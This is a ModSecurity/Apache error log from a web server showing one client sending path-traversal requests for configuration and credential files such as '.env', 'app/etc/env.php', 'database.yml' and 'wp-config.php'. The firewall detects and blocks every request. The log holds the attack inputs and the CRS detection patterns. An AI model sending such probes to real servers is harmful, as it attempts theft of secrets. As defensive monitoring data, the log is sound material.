[Tue May 12 04:51:21.948104 2026] [security2:error] [pid 1808852:tid 1808861] [client 93.123.109.165:32200] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVqRfeipD4uoG21FolhwAAAAY"]
[Tue May 12 04:51:21.948247 2026] [security2:error] [pid 1808852:tid 1808861] [client 93.123.109.165:32200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVqRfeipD4uoG21FolhwAAAAY"]
[Tue May 12 04:51:22.335602 2026] [security2:error] [pid 1808852:tid 1808861] [client 93.123.109.165:32200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVqRfeipD4uoG21FolhwAAAAY"]
[Tue May 12 04:51:22.418803 2026] [security2:error] [pid 1825287:tid 1825321] [client 93.123.109.165:32204] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVqggpmE1yW0glLdgh2gAAANA"]
[Tue May 12 04:51:22.418958 2026] [security2:error] [pid 1825287:tid 1825321] [client 93.123.109.165:32204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVqggpmE1yW0glLdgh2gAAANA"]
[Tue May 12 04:51:22.805608 2026] [security2:error] [pid 1825287:tid 1825321] [client 93.123.109.165:32204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVqggpmE1yW0glLdgh2gAAANA"]
[Tue May 12 04:51:23.553583 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:32210] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVq81tk6y7yBJLpJotJQAAAIg"]
[Tue May 12 04:51:23.553728 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:32210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVq81tk6y7yBJLpJotJQAAAIg"]
[Tue May 12 04:51:23.935284 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:32210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVq81tk6y7yBJLpJotJQAAAIg"]
[Tue May 12 04:51:24.039251 2026] [security2:error] [pid 1808852:tid 1808868] [client 93.123.109.165:32214] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVrBfeipD4uoG21FoliQAAAA0"]
[Tue May 12 04:51:24.039333 2026] [security2:error] [pid 1808852:tid 1808868] [client 93.123.109.165:32214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVrBfeipD4uoG21FoliQAAAA0"]
[Tue May 12 04:51:24.039498 2026] [security2:error] [pid 1808852:tid 1808868] [client 93.123.109.165:32214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVrBfeipD4uoG21FoliQAAAA0"]
[Tue May 12 04:51:24.439465 2026] [security2:error] [pid 1808852:tid 1808868] [client 93.123.109.165:32214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVrBfeipD4uoG21FoliQAAAA0"]
[Tue May 12 04:51:24.520777 2026] [core:error] [pid 1730175:tid 1730180] [client 93.123.109.165:32218] AH10244: invalid URI path (/uploads../../../.env)
[Tue May 12 04:51:25.022094 2026] [core:error] [pid 1825179:tid 1825222] [client 93.123.109.165:32230] AH10244: invalid URI path (/uploads../../../../.env)
[Tue May 12 04:51:25.507961 2026] [security2:error] [pid 1730175:tid 1730191] [client 93.123.109.165:42662] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVrXo6NvB9WXx5V-6h6wAAAQ4"]
[Tue May 12 04:51:25.508058 2026] [security2:error] [pid 1730175:tid 1730191] [client 93.123.109.165:42662] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVrXo6NvB9WXx5V-6h6wAAAQ4"]
[Tue May 12 04:51:25.508251 2026] [security2:error] [pid 1730175:tid 1730191] [client 93.123.109.165:42662] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVrXo6NvB9WXx5V-6h6wAAAQ4"]
[Tue May 12 04:51:25.890128 2026] [security2:error] [pid 1730175:tid 1730191] [client 93.123.109.165:42662] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVrXo6NvB9WXx5V-6h6wAAAQ4"]
[Tue May 12 04:51:25.992468 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:42670] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVrTue9Sp-pIv_Bb64HQAAAU0"]
[Tue May 12 04:51:25.992535 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:42670] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVrTue9Sp-pIv_Bb64HQAAAU0"]
[Tue May 12 04:51:25.992638 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:42670] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVrTue9Sp-pIv_Bb64HQAAAU0"]
[Tue May 12 04:51:26.378684 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:42670] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVrTue9Sp-pIv_Bb64HQAAAU0"]
[Tue May 12 04:51:26.464960 2026] [access_compat:error] [pid 1825179:tid 1825201] [client 93.123.109.165:42676] AH01797: client denied by server configuration: /home/tcttelec/public_html/wp-config.php
[Tue May 12 04:51:26.949533 2026] [security2:error] [pid 1808852:tid 1808856] [client 93.123.109.165:42690] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVrhfeipD4uoG21FoljAAAAAE"]
[Tue May 12 04:51:26.949682 2026] [security2:error] [pid 1808852:tid 1808856] [client 93.123.109.165:42690] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVrhfeipD4uoG21FoljAAAAAE"]
[Tue May 12 04:51:27.702113 2026] [security2:error] [pid 1808852:tid 1808856] [client 93.123.109.165:42690] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVrhfeipD4uoG21FoljAAAAAE"]
[Tue May 12 04:51:27.783156 2026] [security2:error] [pid 1825179:tid 1825205] [client 93.123.109.165:42696] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVr9r1yOh9TvizeziS7AAAAEc"]
[Tue May 12 04:51:27.783309 2026] [security2:error] [pid 1825179:tid 1825205] [client 93.123.109.165:42696] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVr9r1yOh9TvizeziS7AAAAEc"]
[Tue May 12 04:51:28.181363 2026] [security2:error] [pid 1825179:tid 1825205] [client 93.123.109.165:42696] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVr9r1yOh9TvizeziS7AAAAEc"]
[Tue May 12 04:51:28.275720 2026] [security2:error] [pid 1808852:tid 1808867] [client 93.123.109.165:42704] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVsBfeipD4uoG21FoljgAAAAw"]
[Tue May 12 04:51:28.275939 2026] [security2:error] [pid 1808852:tid 1808867] [client 93.123.109.165:42704] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVsBfeipD4uoG21FoljgAAAAw"]
[Tue May 12 04:51:28.658430 2026] [security2:error] [pid 1808852:tid 1808867] [client 93.123.109.165:42704] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVsBfeipD4uoG21FoljgAAAAw"]
[Tue May 12 04:51:28.742272 2026] [security2:error] [pid 1730175:tid 1730177] [client 93.123.109.165:42706] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVsHo6NvB9WXx5V-6h8AAAAQA"]
[Tue May 12 04:51:28.742349 2026] [security2:error] [pid 1730175:tid 1730177] [client 93.123.109.165:42706] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVsHo6NvB9WXx5V-6h8AAAAQA"]
[Tue May 12 04:51:28.742494 2026] [security2:error] [pid 1730175:tid 1730177] [client 93.123.109.165:42706] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVsHo6NvB9WXx5V-6h8AAAAQA"]
